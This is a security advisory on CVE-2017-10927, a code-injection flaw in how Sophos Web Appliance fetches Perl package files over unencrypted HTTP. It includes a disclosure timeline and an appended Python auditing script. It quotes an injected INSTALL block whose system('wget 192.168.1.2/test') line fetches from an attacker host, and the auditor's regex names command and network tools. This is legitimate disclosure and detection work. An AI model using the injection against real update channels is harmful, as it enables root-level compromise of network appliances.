
Advisory: CVE-2017-10927 – Sophos Web Appliance PPD Injection

15/09/2017 | Author: Admin


Overview

Sophos Web Appliance is a “next generation” anti-malware and content filtering proxy appliance created by Sophos.

Description

During a review of Sophos Web Appliance, MDSec discovered a remote code injection vulnerability that can be exploited by a suitably positioned, unauthenticated attacker within the network.
Versions of the appliance prior to 4.3.2.1 periodically make a number of requests to swa-dynamic.sophosupd.com to retrieve Perl package description (PPD) files, for example:
172.16.1.153 - - [29/Jun/2017 16:55:02] "GET /swa/data/mainline/Sophos-Labs-Data.ppd HTTP/1.1" 200 -
172.16.1.153 - - [29/Jun/2017 16:56:01] "GET /swa/data/mainline/Sophos-App-Control-Data.ppd HTTP/1.1" 200
172.16.1.153 - - [29/Jun/2017 16:57:02] "GET /swa/data/mainline/PureMessage-Sophos-Engine.ppd HTTP/1.1" 200 -

These requests are performed over HTTP, meaning that a suitably positioned attacker within the network is able to intercept the communications through either DNS poisoning or an ARP man-in-the-middle attack. The PPD packages retrieved by the appliance contain a Perl script that is ultimately executed. Furthermore, the user executing this unsigned script has unrestricted sudo privileges, allowing for privilege escalation to root.

The attacker is able to gain code execution on the SWA either by replacing the archive, including the install.pl script within it, or by simply injecting arbitrary Perl into the install commands:

<INSTALL EXEC="PPM_PERL">
BEGIN { unlink __FILE__ } # Old ppm workaround
system('wget 192.168.1.2/test');
do './install.pl' || die "Install script did not succeed!\n$@$!\n";
</INSTALL>

This issue was resolved in version 4.3.2.1 of the appliance.
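As an added example (not part of MDSec's advisory or Sophos's code), the following Python script audits the INSTALL blocks of a PPD file against the stanza an ordinary archive install carries and reports any other statement, which is one way to check a cached update file for tampering offline. The expected stanza and the list of suspicious Perl primitives are assumptions; the sample input is the INSTALL block quoted above.

```python
"""Audit the INSTALL blocks of a Perl Package Description (PPD) file."""
import re
import xml.etree.ElementTree as ET

# Assumed baseline: the two statements an ordinary archive-install stanza carries.
EXPECTED = {
    "BEGIN { unlink __FILE__ }",
    "do './install.pl' || die \"Install script did not succeed!\\n$@$!\\n\";",
}

# Perl primitives that run commands or reach the network (a coarse net, assumed).
SUSPICIOUS = re.compile(
    r"\b(system|exec|fork|socket|qx)\b|`[^`]*`|\b(wget|curl|fetch|nc)\b"
)

def _statement(line):
    """Drop a trailing '#' comment and surrounding whitespace.
    Simplification: a '#' inside a string literal would also be cut."""
    return line.split("#", 1)[0].strip()

def audit_ppd(ppd_text):
    """Return (exec_mode, statement, reasons) for every statement in an
    INSTALL block that is not part of the expected install stanza."""
    findings = []
    root = ET.fromstring(ppd_text.strip())
    for install in root.iter("INSTALL"):  # iter() also yields the root itself
        # PPM runs the body as Perl for EXEC="PPM_PERL"; without EXEC it is a shell command
        mode = install.get("EXEC", "<shell>")
        for raw in (install.text or "").splitlines():
            stmt = _statement(raw)
            if not stmt or stmt in EXPECTED:
                continue
            reasons = ["not in expected install stanza"]
            if SUSPICIOUS.search(stmt):
                reasons.append("command or network primitive")
            findings.append((mode, stmt, tuple(reasons)))
    return findings

# Sample input: the tampered INSTALL block quoted in the advisory above.
SAMPLE_PPD = """<INSTALL EXEC="PPM_PERL">
BEGIN { unlink __FILE__ } # Old ppm workaround
system('wget 192.168.1.2/test');
do './install.pl' || die "Install script did not succeed!\\n$@$!\\n";
</INSTALL>"""

if __name__ == "__main__":
    for mode, stmt, reasons in audit_ppd(SAMPLE_PPD):
        print(f"[{mode}] {stmt}  <- {'; '.join(reasons)}")
```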

Timeline

30-06-2017: MDSec contact security@sophos.com who provided the security-alert@ contact
30-06-2017: MDSec provide a PGP encrypted report of the vulnerability
30-06-2017: Sophos acknowledge receipt and pass the report on to the relevant team
30-06-2017: Sophos acknowledge the vulnerability as a known problem
18-07-2017: Sophos provide update reporting fix is causing issues and further trials are required
01-08-2017: Sophos contact MDSec documenting the fix is in place, they are now using cert pinning
08-08-2017: MDSec request permission to disclose
22-08-2017: Sophos confirm they’re happy to disclose this issue

Credits

This vulnerability was identified by @domchell.

MDSec would like to thank Sophos for their assistance in resolving and disclosing this vulnerability.
